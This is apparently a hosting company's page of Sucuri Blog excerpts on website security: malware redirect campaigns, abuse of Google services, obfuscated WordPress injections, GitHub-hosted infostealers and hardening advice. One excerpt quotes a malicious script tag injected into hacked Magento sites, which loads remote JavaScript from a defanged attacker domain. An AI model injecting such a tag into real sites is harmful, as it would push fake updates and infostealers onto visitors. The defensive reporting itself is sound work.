Call Us Today at 1-403-291-9811 or 1-866-291-3857

Web Security

  • Steps to Keep Your Site Clean: Updates 24 April 2018 Steps to Keep Your Site Clean: Updates

    This is the second post of a series about Steps to Keep Your Site Clean. In the first post, we talked about Access Points; here we are going to offer more insight on Updates.


    Repeatedly we see websites being infected or reinfected when important security updates are not taken seriously. Most software updates are created due to a security breach that has been fixed. Updating to the new version keeps your site safe from vulnerabilities that are very likely to affect your site.

    Continue reading Steps to Keep Your Site Clean: Updates at Sucuri Blog.

  • From Baidu to Google’s Open Redirects 18 April 2018 From Baidu to Google’s Open Redirects

    Last week, we described how an ongoing massive malware campaign began using Baidu search result links to redirect people to various ad and scam pages.

    It didn’t last long. Soon after the publication of that article, the bad actors changed the links to use compromised third-party sites and a couple of day later they began using Google’s URL shortening service.

    This is a snippet from their decoded script:

    The Redirect Chain

    If you check Google’s own information about that shortened URL, it shows that the URL redirects to another Google owned URL which looks quite benign.

    Continue reading From Baidu to Google’s Open Redirects at Sucuri Blog.

  • Malicious Activities with Google Tag Manager 17 April 2018 Malicious Activities with Google Tag Manager

    If I were to ask if you could trust a script from Google that is loading on your website, the majority of users would say “yes” or even “absolutely”. But when malicious behavior ensues, everything should be double-checked and suspected, even assets that come from “trusted sources” like Google, Facebook, and Youtube.

    In the past, we saw how adsense was abused with a malvertising campaign. Even more recently, we saw how attackers injected malware that called Google AdSense ads to generate revenue for the attackers, however, there’s an even more troublesome part of the toolkit that Google offers to webmasters – Google Tag Manager.

    Continue reading Malicious Activities with Google Tag Manager at Sucuri Blog.

  • Content Security Policy 13 April 2018 Content Security Policy

    As a website owner, it’s a good idea to be aware of the security issues that might affect your site. For example, Cross-site Scripting (XSS) attacks consist of injecting malicious client-side scripts into a website and using the website as a propagation method.

    You probably know too that client-side scripts can be programmed to do pretty much anything. They can be as simple as showing an alert message in your website, to animating images, mining cryptocurrencies or showing pop-ups that contain NSFW pharma products.

    Continue reading Content Security Policy at Sucuri Blog.

  • Unwanted Ads via Baidu Links 10 April 2018 Unwanted Ads via Baidu Links

    The malware attack that began as an installation of malicious Injectbody/Injectscr WordPress plugins back in February has evolved since then.

    Some of the changes were documented as updates at the bottom of the original blog post, however, every week we see minor modifications in the way they obfuscate the scripts or the files they inject them into.

    Encrypted WordPress JavaScript Files

    At this moment, the most common injection targets are core WordPress JavaScript files:


    Hackers add the malicious code and then obfuscate the entire file contents along with the original legitimate code so that the only way to clean the files without breaking the site functionality is to replace them with their original clean copies.

    Continue reading Unwanted Ads via Baidu Links at Sucuri Blog.

  • Hacked Website Trend Report – 2017 6 April 2018 Hacked Website Trend Report – 2017

    We are proud to be releasing our latest Hacked Website Trend Report for 2017.

    This report is based on data collected and analyzed by the Sucuri Remediation Group (RG), which includes the Incident Response Team (IRT) and the Malware Research Team (MRT).

    The data presented stems from the analysis of 34,371 infected websites summarizing the latest trends by bad actors. In this report, we build from data points seen in the 2016/Q3 report to identify the latest tactics, techniques, and procedures (TTPs) detected by the Remediation Group.

    Continue reading Hacked Website Trend Report – 2017 at Sucuri Blog.

  • Obfuscation Through Legitimate Appearances 4 April 2018 Obfuscation Through Legitimate Appearances

    Recently, I analyzed a malware sample provided by our analyst Edward C. Woelke and noticed that it had been placed in a core WordPress folder. This seemed suspicious, since no such core WP file like it exists: ./wp-includes/init.php

    Deceiving Appearances

    I started with a standard analysis and my first thought was, this has to be a legitimate file! Nicely structured, with very legit-looking function names. It even used Object Oriented PHP, which doesn’t happen very often in the case of malware.

    Continue reading Obfuscation Through Legitimate Appearances at Sucuri Blog.

  • What is Virtual Hardening? 26 March 2018 What is Virtual Hardening?

    If you want to make your website security more robust, you need to think about hardening. To harden your website means to add different layers of protection to reduce the potential attack surface. Hardening often involves manual measures of adding code or making changes to the configuration. To virtually harden your site involves allowing a Web Application Firewall (WAF) or security plugin to automatically harden your website.

    The concept of hardening is part of a defense-in-depth strategy that protects your web server and database from vulnerability exploitation.

    Continue reading What is Virtual Hardening? at Sucuri Blog.

  • GitHub Hosts Infostealers Part 2: Cryptominers and Credit Card Stealers 21 March 2018 GitHub Hosts Infostealers Part 2: Cryptominers and Credit Card Stealers

    Update – March 28th, 2018:

    The fake Flash update files referenced in this post have been moved from GitHub to[.]tl, and the bit.wo[.]tc script to byte.wo[.]tc.

    A few days ago, we reported that hacked Magento sites had been pushing infostealing malware under the disguise of Flash player updates.

    In this post, we’ll reveal how this recent attack is related to an extremely hot topic – cryptocurrencies and cryptomining.

    Continue reading GitHub Hosts Infostealers Part 2: Cryptominers and Credit Card Stealers at Sucuri Blog.

  • GitHub Hosts Infostealer 15 March 2018 GitHub Hosts Infostealer

    A few months ago, we reported on how cybercriminals were using GitHub to load a variety of cryptominers on hacked websites. We have now discovered that this same approach is being used to push binary “info stealing” malware to Windows computers.

    Infected Magento Sites

    Recently, we identified hundreds of infected Magento sites with the following injected script:

    <script type="text/javascript" src="https://bit.wo[.]tc/js/lib/js.js"></script>

    The contents of the js.js file included:

    This code creates a hidden div and after a short delay displays a fake Flash Player update banner above the normal site content.

    Continue reading GitHub Hosts Infostealer at Sucuri Blog.

  • Steps to Keep Your Site Clean: Access Points 13 March 2018 Steps to Keep Your Site Clean: Access Points

    Unfortunately, most website owners know what it’s like to have a site hacked – the panic, the rush to find anyone out there that can help, and the worry it causes. Maybe you were able to get your site back on track or had a company clean the site for you, but the important thing is that your site is finally safe, or so you thought.

    Avoid Website Reinfections

    There are many ways in which a site can become reinfected after a cleanup.

    Continue reading Steps to Keep Your Site Clean: Access Points at Sucuri Blog.